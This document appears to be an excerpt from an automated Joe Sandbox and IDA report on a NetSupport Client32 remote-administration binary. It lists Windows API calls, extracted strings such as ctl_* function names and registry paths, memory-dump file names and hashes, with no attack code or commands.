                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                        • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                        • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                        • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                        • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                      • String ID: NSMClassList$NSMFindClassEvent
                                                                                      • API String ID: 1622498684-2883797795
                                                                                      • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                      • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                      • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                      APIs
                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                      • _memset.LIBCMT ref: 1115B266
                                                                                      • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                      • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                      • GetDesktopWindow.USER32 ref: 1115B309
                                                                                      • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2935161463-0
                                                                                      • Opcode ID: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                      • Opcode Fuzzy Hash: a7205b1e4ecbd9aa5000b534947fd741d9615ccee10b4499b543e29c859a81cd
                                                                                      • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                      • API String ID: 1096595926-1306570422
                                                                                      • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                      • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                      • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                      APIs
                                                                                        • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                        • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                      • wsprintfA.USER32 ref: 1100548D
                                                                                      • DeleteObject.GDI32(?), ref: 110054E2
                                                                                      • DeleteObject.GDI32(?), ref: 110054EB
                                                                                      • SelectObject.GDI32(?,?), ref: 11005502
                                                                                      • DeleteObject.GDI32(?), ref: 11005508
                                                                                      • DeleteDC.GDI32(?), ref: 1100550E
                                                                                      • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                      • DeleteObject.GDI32(?), ref: 11005528
                                                                                      • DeleteDC.GDI32(?), ref: 1100552E
                                                                                      • DeleteObject.GDI32(?), ref: 1100553F
                                                                                      • DeleteObject.GDI32(?), ref: 1100556A
                                                                                      • DeleteObject.GDI32(?), ref: 11005588
                                                                                      • DeleteObject.GDI32(?), ref: 11005591
                                                                                      • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                      • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                      • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                      • API String ID: 2789700732-770455996
                                                                                      • Opcode ID: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                      • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                      • Opcode Fuzzy Hash: e13003ec6840c43133b5e7c41f10c235945c387ed2d4b2202841e9d2f082b00b
                                                                                      • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                      APIs
                                                                                      • BeginPaint.USER32(?,?), ref: 110152BF
                                                                                      • GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                      • _memset.LIBCMT ref: 110152E5
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                      • BeginPath.GDI32(00000000), ref: 1101532D
                                                                                      • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                      • EndPath.GDI32(00000000), ref: 11015357
                                                                                      • PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                      • CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                      • CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                      • CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                      • SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                      • GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                      • OffsetRgn.GDI32(00000000,?,00000000), ref: 110153EA
                                                                                      • FillRgn.GDI32(00000000,00000000,?), ref: 110153F9
                                                                                      • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101540C
                                                                                      • DeleteObject.GDI32(00000000), ref: 11015419
                                                                                      • SelectObject.GDI32(00000000,?), ref: 11015423
                                                                                      • SelectObject.GDI32(00000000,?), ref: 1101542D
                                                                                      • DeleteObject.GDI32(?), ref: 11015436
                                                                                      • DeleteObject.GDI32(?), ref: 1101543F
                                                                                      • DeleteObject.GDI32(?), ref: 11015448
                                                                                      • SelectObject.GDI32(00000000,?), ref: 11015452
                                                                                      • DeleteObject.GDI32(?), ref: 1101545B
                                                                                      • SetBkMode.GDI32(00000000,?), ref: 11015465
                                                                                      • EndPaint.USER32(?,?), ref: 11015479
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3702029449-0
                                                                                      • Opcode ID: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                      • Instruction ID: 652d7b9cefe541cc9f67407d7bb7a055c5a4b94d45e30f14e3a138b487ffb704
                                                                                      • Opcode Fuzzy Hash: 24b8a3e860cad455b09ae9666a62e4d5b44d953a1c6f38d3d180a12544eed90e
                                                                                      • Instruction Fuzzy Hash: 0D511875A10228AFDB14DBA4CC88FAEF7B9EF89304F004199E519D7244DB74AE44CF61
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75BF8400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                      • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                      • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                      • wsprintfA.USER32 ref: 110FF5BE
                                                                                      • _memset.LIBCMT ref: 110FF5CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                      • API String ID: 137837830-2801557662
                                                                                      • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                      • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                      • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                      • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _memset.LIBCMT ref: 11135335
                                                                                      • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                      • _strncpy.LIBCMT ref: 11135425
                                                                                      • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,4012B9B4,00000000,1102E392,00000001), ref: 11135436
                                                                                      • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                      • GetWindowTextA.USER32(0002046E,?,00000180), ref: 11135478
                                                                                      • wsprintfA.USER32 ref: 111354F4
                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                      • wsprintfA.USER32 ref: 1113552C
                                                                                      • wsprintfA.USER32 ref: 1113558D
                                                                                      • wsprintfA.USER32 ref: 111355E8
                                                                                      • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,4012B9B4,00000000,1102E392,00000001), ref: 11135623
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                      • String ID: %s$%s%s$405464$Client$SysTray$
                                                                                      • API String ID: 1881589080-1089849070
                                                                                      • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                      • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                      • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                      • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • wsprintfA.USER32 ref: 110EB1B8
                                                                                      • GetTickCount.KERNEL32 ref: 110EB212
                                                                                      • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                      • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                      • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                      • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                      • API String ID: 3451743168-2289091950
                                                                                      • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                      • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                      • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                      • API String ID: 2111968516-1286714176
                                                                                      • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                      • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                      • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                      • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • _malloc.LIBCMT ref: 1100B366
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,4012B9B4,?,00000000,00000000), ref: 1100AC84
                                                                                        • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                        • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                        • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                        • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                        • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                        • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
